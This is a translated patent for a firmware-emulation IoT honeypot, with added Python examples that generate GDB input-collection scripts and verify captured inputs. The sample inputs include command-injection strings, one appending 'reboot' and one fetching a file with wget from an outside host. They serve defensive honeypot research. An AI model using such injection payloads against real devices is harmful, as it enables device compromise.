Starting from the output of the firmware analyzer and the firmware image, a debug script is generated from the alert information; GDB then uses it to control the collection of input information on the honeypot. After these scripts are generated, FirmAE is instantiated, the firmware is extracted, and the image is prepared with the custom Linux kernel and the firmware. FirmAE then tests whether the firmware image can be emulated successfully and sets up the network connection automatically. After the setup phase is complete, the honeypot is started and executed. The honeypot opens a netcat session and the cloud server host starts the custom communicator. The communicator connects to the netcat server on the honeypot, retrieves the list of active processes, and starts a tcpdump session to capture all incoming network traffic. Based on the process activity list and the list of symbolic links, the communicator sends a command to the honeypot to start the GDB server, executes the debug script on the cloud server host, and connects to the GDB server on the honeypot to collect the inputs remotely.
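The debug-script step of the flow above, as an added example written for this page (it is not the patent's communicator or its debug script): a generator that turns the alerts from the analysis stage into a GDB command file for the remote session, and a parser that turns the log GDB writes on the cloud host back into collected input records. The gdbserver address, log path, argument-register tables for MIPS and ARM, the sink table and the sample log are all assumptions or constructed data.

```python
"""Generating the GDB script that collects inputs on the honeypot, and parsing
the log it writes. Added example for this page, not the patent's communicator
or debug script: gdbserver address, log path, the MIPS/ARM argument-register
tables, the sink table and the sample log are assumptions or constructed data."""
import re

ARG_REGS = {"mips": ["$a0", "$a1", "$a2", "$a3"],   # o32 argument registers
            "arm": ["$r0", "$r1", "$r2", "$r3"]}    # AAPCS argument registers
SINK_ARGS = {"strcpy": [1], "sprintf": [2], "system": [0]}  # positions carrying input


def gdb_script(alerts, arch, gdbserver, logfile):
    """Build a GDB command file: one breakpoint per alerted sink. Each hit logs a
    marker line and the string argument(s), then lets the process continue."""
    lines = ["set pagination off",
             "set confirm off",
             f"set logging file {logfile}",
             "set logging overwrite on",
             "set logging enabled on",            # GDB >= 12; older: 'set logging on'
             f"target remote {gdbserver}"]        # gdbserver started on the honeypot
    for a in alerts:
        lines += [f"break {a['sink']}", "commands", "  silent",
                  f'  printf "INPUT {a["binary"]} {a["sink"]} line{a["line"]}\\n"']
        for pos in SINK_ARGS[a["sink"]]:
            lines.append(f"  x/s {ARG_REGS[arch][pos]}")   # dump the tainted argument
        lines += ["  continue", "end"]
    lines.append("continue")
    return "\n".join(lines) + "\n"


MARKER_RE = re.compile(r"^INPUT (\S+) (\S+) line(\d+)$")
XS_RE = re.compile(r'^(0x[0-9a-fA-F]+)(?: <[^>]*>)?:\s*"(.*)"$')   # shape of x/s output


def parse_input_log(text):
    """Turn the GDB log into records {binary, sink, line, address, input}."""
    records, current = [], None
    for raw in text.splitlines():
        m = MARKER_RE.match(raw)
        if m:
            current = {"binary": m.group(1), "sink": m.group(2), "line": int(m.group(3))}
            continue
        m = XS_RE.match(raw)
        if m and current is not None:
            text_in = m.group(2).encode("latin-1").decode("unicode_escape")  # undo GDB escaping
            records.append({**current, "address": m.group(1), "input": text_in})
    return records


# Alerts as the analysis stage would hand them over, and a log as GDB would
# write it on the cloud host (both constructed for this example).
ALERTS = [{"binary": "cgibin", "line": 2, "sink": "strcpy"},
          {"binary": "cgibin", "line": 4, "sink": "system"}]
SAMPLE_LOG = """INPUT cgibin strcpy line2
0x7fff6e40:\t"GET /apply.cgi?ping=1.2.3.4;reboot"
INPUT cgibin system line4
0x4a0010:\t"ping 1.2.3.4;reboot"
"""

if __name__ == "__main__":
    print(gdb_script(ALERTS, "mips", "192.0.2.10:1234", "/tmp/inputs.log"))
    for r in parse_input_log(SAMPLE_LOG):
        print(r)
```

The generated file is run on the cloud host as `gdb -batch -x <script> <binary>` against the gdbserver the communicator started on the honeypot. Breakpoints are set on the sink function rather than on the tainted instruction, so the same script works whether the sink lives in the binary or in the shared libc, and `silent` plus `continue` keep the honeypot process running so the attacker sees no stall.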
Step S4: combining the cloud server input information obtained in step S3, the alert information of the firmware collected in step S2 and the input information that triggers the alert, the execution state of the cloud server input information is reconstructed to verify whether the input collected by the honeypot actually triggers the vulnerability, and threat information is captured. In addition, the network traffic information acquired in step S3 can be subjected to fingerprint-based traffic analysis to capture threat information.
The reconstructed execution state is used to verify whether the cloud server input information obtained in step S3 triggers an actual vulnerability; threat information is then captured, and the input information, the execution flow record, the vulnerability type and its location are recorded in a database, which facilitates countermeasures and defense.
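The verification and recording step above, as an added example written for this page (it is not the patent's verification module): each collected input is replayed against the path constraint of the alert it was collected at, the outcome is stored with the execution path, vulnerability type and location, and only the inputs that really reach the vulnerable state are returned as threat information. The constraint rules stand in for the comparison against symbolic path constraints; the alerts, execution paths, buffer size and inputs are constructed for the example, and an in-memory SQLite table stands in for the patent's database.

```python
"""Verifying collected inputs against the path constraints of an alert and
recording the verified threats. Added example for this page, not the patent's
verification module: the constraint rules stand in for the symbolic-execution
comparison, and the alerts, execution paths and inputs are constructed."""
import sqlite3


def _stack_overflow(data, alert):
    """strcpy into a fixed buffer: copies up to the first NUL plus the terminator."""
    data = data.split(b"\0", 1)[0]
    return len(data) >= alert["buffer_size"], f"len={len(data)} buffer={alert['buffer_size']}"


def _command_injection(data, alert):
    """system() with attacker text: any shell metacharacter changes the command."""
    meta = [m for m in (b";", b"|", b"&", b"`", b"$(", b"\n") if m in data]
    return bool(meta), f"metachars={meta}"


CONSTRAINTS = {"stack_overflow": _stack_overflow,
               "command_injection": _command_injection}


def verify(alert, data):
    """Return (triggered, reason) for one alert/input pair."""
    return CONSTRAINTS[alert["vuln_type"]](data, alert)


SCHEMA = """CREATE TABLE IF NOT EXISTS threats (
    id INTEGER PRIMARY KEY, input BLOB, exec_path TEXT, vuln_type TEXT,
    location TEXT, triggered INTEGER, reason TEXT)"""


def run_verification(alerts, inputs, db_path=":memory:"):
    """Replay each input against the alert whose sink it was collected at, store
    every outcome, and return (rows that trigger a vulnerability, rows stored)."""
    conn = sqlite3.connect(db_path)
    conn.execute(SCHEMA)
    for rec in inputs:
        for alert in alerts:
            if (alert["binary"], alert["sink"]) != (rec["binary"], rec["sink"]):
                continue
            triggered, reason = verify(alert, rec["input"])
            conn.execute(
                "INSERT INTO threats (input, exec_path, vuln_type, location, triggered, reason)"
                " VALUES (?, ?, ?, ?, ?, ?)",
                (rec["input"], " -> ".join(alert["exec_path"]), alert["vuln_type"],
                 f"{alert['binary']}:{alert['line']}", int(triggered), reason))
    conn.commit()
    hits = conn.execute("SELECT location, vuln_type, input FROM threats"
                        " WHERE triggered = 1 ORDER BY id").fetchall()
    total = conn.execute("SELECT COUNT(*) FROM threats").fetchone()[0]
    conn.close()
    return hits, total


# Constructed alerts (with the vulnerable execution path from the analysis
# stage) and constructed inputs as the GDB collector would hand them over.
ALERTS = [
    {"binary": "cgibin", "sink": "strcpy", "line": 2, "vuln_type": "stack_overflow",
     "buffer_size": 64, "exec_path": ["httpd:recv", "setenv QUERY_STRING",
                                      "cgibin:getenv", "cgibin:strcpy"]},
    {"binary": "cgibin", "sink": "system", "line": 4, "vuln_type": "command_injection",
     "exec_path": ["httpd:recv", "setenv QUERY_STRING", "cgibin:sprintf", "cgibin:system"]},
]
INPUTS = [
    {"binary": "cgibin", "sink": "strcpy", "input": b"ping=1.2.3.4"},
    {"binary": "cgibin", "sink": "strcpy", "input": b"A" * 96},
    {"binary": "cgibin", "sink": "system", "input": b"ping 1.2.3.4"},
    {"binary": "cgibin", "sink": "system", "input": b"ping 1.2.3.4;wget http://198.51.100.7/x"},
]

if __name__ == "__main__":
    hits, total = run_verification(ALERTS, INPUTS)
    print(f"{len(hits)} of {total} collected inputs verified as real triggers:")
    for location, vuln_type, data in hits:
        print(f"  {location} {vuln_type} {data!r}")
```

Recording the non-triggering inputs as well (with their reason) is deliberate: the benign requests are what a real attacker sends while probing, and keeping them next to the verified triggers is what later makes the attack path reconstructible from the database.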
Further, vulnerability information on different types and models of Internet of Things devices is collected from network data or experimental data, a complete vulnerability exploitation database is established, and the feature information of the induced vulnerabilities is extracted. The access traffic of the devices in the honeypot is monitored in real time, threat data is compared synchronously against the database, and the threat information obtained is recorded synchronously in a MySQL database for later backtracking. In addition, the attack path of the attacker is obtained from the relevant log information in the honeypot, statistics are compiled in a timely manner, and high-interaction operation is carried out, so that the concealment and persistence of the system are ensured.
In summary, the application analyzes the feature information of the firmware with the Binwalk tool, analyzes the firmware with techniques such as static taint analysis, emulates the firmware image with the FirmAE framework, effectively monitors and captures network traffic in real time by deploying the honeypot system in a virtualized environment, parses the network traffic into input information, and performs vulnerability mining by combining the input information with the alert information, thereby improving the capability of the system to defend against various attack behaviors and constructing a safer and more reliable security protection system.
As shown in FIG. 4, the application further provides a firmware emulation-based high-interaction Internet of Things honeypot deployment system for implementing the firmware emulation-based high-interaction Internet of Things honeypot deployment method; the system comprises:
The firmware acquisition module is used for acquiring the firmware.
The alert information acquisition module is used for performing image analysis on the firmware, analyzing the firmware image with static taint analysis and symbolic execution, and acquiring the alert information of the firmware and the input information that triggers the alert.
Further, the alert information acquisition module comprises:
The boundary binary search sub-module is used for decompressing and decrypting the firmware image to obtain the corresponding file system; each binary file in the file system is analyzed, code related to network services is searched for, a binary file containing such code is taken as a boundary binary file, the execution of the program is simulated with symbolic execution to determine all code paths the program may encounter at run time, and the code paths related to network services are detected.
The binary dependency graph construction sub-module is used for constructing the binary dependency graph according to the communication modes among the binary files.
The vulnerability search sub-module is used for tracking the program data flow with static taint analysis according to the binary dependency graph, and acquiring the alert information, the input information that triggers the alert and the vulnerable execution path.
The cloud server input information acquisition module is used for building the honeypot system on the cloud server, configuring the communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers.
The cloud server input information verification module is used for reconstructing the input information of the cloud server according to the alert information of the firmware and the input information that triggers the alert, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information.
Correspondingly, the application also provides an electronic device, comprising one or more processors and a memory for storing one or more programs; when the one or more programs are executed by the one or more processors, the one or more processors implement the firmware emulation-based high-interaction Internet of Things honeypot deployment method. FIG. 5 shows the hardware structure of any device with data processing capability on which the method is located; in addition to the processor, the memory and the network interface shown in FIG. 5, such a device may generally include other hardware according to its actual function, which is not described here.
Correspondingly, the application also provides a computer readable storage medium on which computer instructions are stored; when the instructions are executed by a processor, the firmware emulation-based high-interaction Internet of Things honeypot deployment method is implemented. The computer readable storage medium may be an internal storage unit, such as a hard disk or memory, of any of the data-processing devices described in the previous embodiments. It may also be an external storage device attached to the device, such as a plug-in hard disk, a Smart Media Card (SMC), an SD card or a flash memory card. Further, it may comprise both internal storage units and external storage devices. The computer readable storage medium is used for storing the computer program and the other programs and data required by the device, and may also be used for temporarily storing data that has been output or is to be output.
The foregoing description of the preferred embodiments of the application is not intended to be limiting, but rather is intended to cover all modifications, equivalents, alternatives, and improvements that fall within the spirit and scope of the application.

Claims (9)

1. A firmware emulation-based high-interaction Internet of Things honeypot deployment method, characterized by comprising the following steps:
acquiring firmware;
performing image analysis on the firmware, and analyzing the firmware image with static taint analysis and symbolic execution to acquire alert information of the firmware and input information that triggers the alert;
building a honeypot system on a cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers;
reconstructing the input information of the cloud server according to the alert information of the firmware and the input information that triggers the alert, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information;
wherein acquiring the alert information of the firmware and the input information that triggers the alert comprises the steps of:
decompressing and decrypting the firmware image to obtain the corresponding file system;
analyzing each binary file in the file system, searching for code related to network services contained in the binary file, simulating program execution with symbolic execution, determining all code paths the program may encounter at run time, and detecting the code execution paths related to network services;
constructing a binary dependency graph according to the communication modes among the binary files;
according to the binary dependency graph, tracking the program data flow with static taint analysis, and acquiring the alert information, the input information that triggers the alert and the vulnerable execution path.
2. The firmware emulation-based high-interaction Internet of Things honeypot deployment method of claim 1, wherein searching for code related to network services contained in a binary file comprises:
taking the binary file containing code related to network services as a boundary binary file, which is the entry point for vulnerability analysis.
3. The firmware emulation-based high-interaction Internet of Things honeypot deployment method of claim 1, wherein constructing a binary dependency graph according to the communication modes among binary files comprises:
analyzing each binary file in the firmware image, and screening out the binary files containing function calls;
guiding the function calls by the network keywords in the parameter registers, determining the function calls that contain code related to network services and that can communicate between different binary files, and marking them as communication basic blocks;
connecting all the communication basic blocks to obtain the binary dependency graph.
4. The firmware emulation-based high-interaction Internet of Things honeypot deployment method of claim 1, wherein building a honeypot system on a cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers comprises:
emulating the firmware image with the FirmAE framework;
building the honeypot system on the cloud server and configuring the communicator, the communicator being used for managing communication between the honeypot system and the cloud server, managing the list of processes running on the honeypot and screening out malicious processes.
5. The firmware emulation-based high-interaction Internet of Things honeypot deployment method of claim 1, wherein reconstructing the input information of the cloud server according to the alert information of the firmware and the input information that triggers the alert, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information comprises:
for the code execution path related to network services, acquiring the path constraint conditions on that execution path according to the alert information of the firmware, and reconstructing the symbolic expression of the program;
converting the input information of the cloud server into input variables, simulating the execution of the program with symbolic execution, determining the tainted input variables, comparing the tainted input variables with the path constraint conditions, and determining whether an exploitable vulnerability exists; threat intelligence is generated when an exploitable vulnerability exists.
6. A firmware emulation-based high-interaction Internet of Things honeypot deployment system, characterized in that it is configured to implement the firmware emulation-based high-interaction Internet of Things honeypot deployment method of any one of claims 1 to 5, the system comprising:
a firmware acquisition module, used for acquiring firmware;
an alert information acquisition module, used for performing image analysis on the firmware, analyzing the firmware image with static taint analysis and symbolic execution, and acquiring the alert information of the firmware and the input information that triggers the alert;
a cloud server input information acquisition module, used for building the honeypot system on the cloud server, configuring the communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers;
a cloud server input information verification module, used for reconstructing the input information of the cloud server according to the alert information of the firmware and the input information that triggers the alert, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information.
7. The firmware emulation-based high-interaction Internet of Things honeypot deployment system of claim 6, wherein the alert information acquisition module comprises:
a boundary binary search sub-module, used for decompressing and decrypting the firmware image to obtain the corresponding file system; analyzing each binary file in the file system, searching for code related to network services contained in the binary file, taking the binary file containing such code as a boundary binary file, simulating program execution with symbolic execution, determining all code paths the program may encounter at run time, and detecting the code paths related to network services;
a binary dependency graph construction sub-module, used for constructing the binary dependency graph according to the communication modes among the binary files;
a vulnerability search sub-module, used for tracking the program data flow with static taint analysis according to the binary dependency graph, and acquiring the alert information, the input information that triggers the alert and the vulnerable execution path.
8. An electronic device comprising a memory and a processor, wherein the memory is coupled to the processor; the memory is used for storing program data, and the processor is used for executing the program data to implement the firmware emulation-based high-interaction Internet of Things honeypot deployment method of any one of claims 1 to 5.
9. A computer readable storage medium having a computer program stored thereon, wherein the program, when executed by a processor, implements the firmware emulation-based high-interaction Internet of Things honeypot deployment method of any one of claims 1 to 5.
CN202310763186.5A 2023-06-27 2023-06-27 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system Active CN116502226B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202310763186.5A CN116502226B (en) 2023-06-27 2023-06-27 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202310763186.5A CN116502226B (en) 2023-06-27 2023-06-27 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system

Publications (2)

Publication Number Publication Date
CN116502226A CN116502226A (en) 2023-07-28
CN116502226B true CN116502226B (en) 2023-09-08

Family

ID=87325178

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202310763186.5A Active CN116502226B (en) 2023-06-27 2023-06-27 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system

Country Status (1)

Country Link
CN (1) CN116502226B (en)

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101087196A (en) * 2006-12-27 2007-12-12 北京大学 Multi-layer honey network data transmission method and system
CN106850582A (en) * 2017-01-05 2017-06-13 中国电子科技网络信息安全有限公司 A kind of APT Advanced threat detection methods based on instruction monitoring
CN112417444A (en) * 2020-12-03 2021-02-26 南京邮电大学 Attack trapping system based on firmware simulation
CN113810423A (en) * 2021-09-22 2021-12-17 中能融合智慧科技有限公司 Industrial control honey pot
CN116015717A (en) * 2022-11-30 2023-04-25 杭州安恒信息技术股份有限公司 Network defense method, device, equipment and storage medium

Family Cites Families (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US9503470B2 (en) * 2002-12-24 2016-11-22 Fred Herz Patents, LLC Distributed agent based model for security monitoring and response
US10462181B2 (en) * 2016-05-10 2019-10-29 Quadrant Information Security Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures
US20220329616A1 (en) * 2017-11-27 2022-10-13 Lacework, Inc. Using static analysis for vulnerability detection

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
Guo Shize et al., "SSL/TLS protocol attack detection method based on flow spectrum theory", Chinese Journal of Network and Information Security, vol. 8, no. 1, pp. 30-40 *

Also Published As

Publication number Publication date
CN116502226A (en) 2023-07-28

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant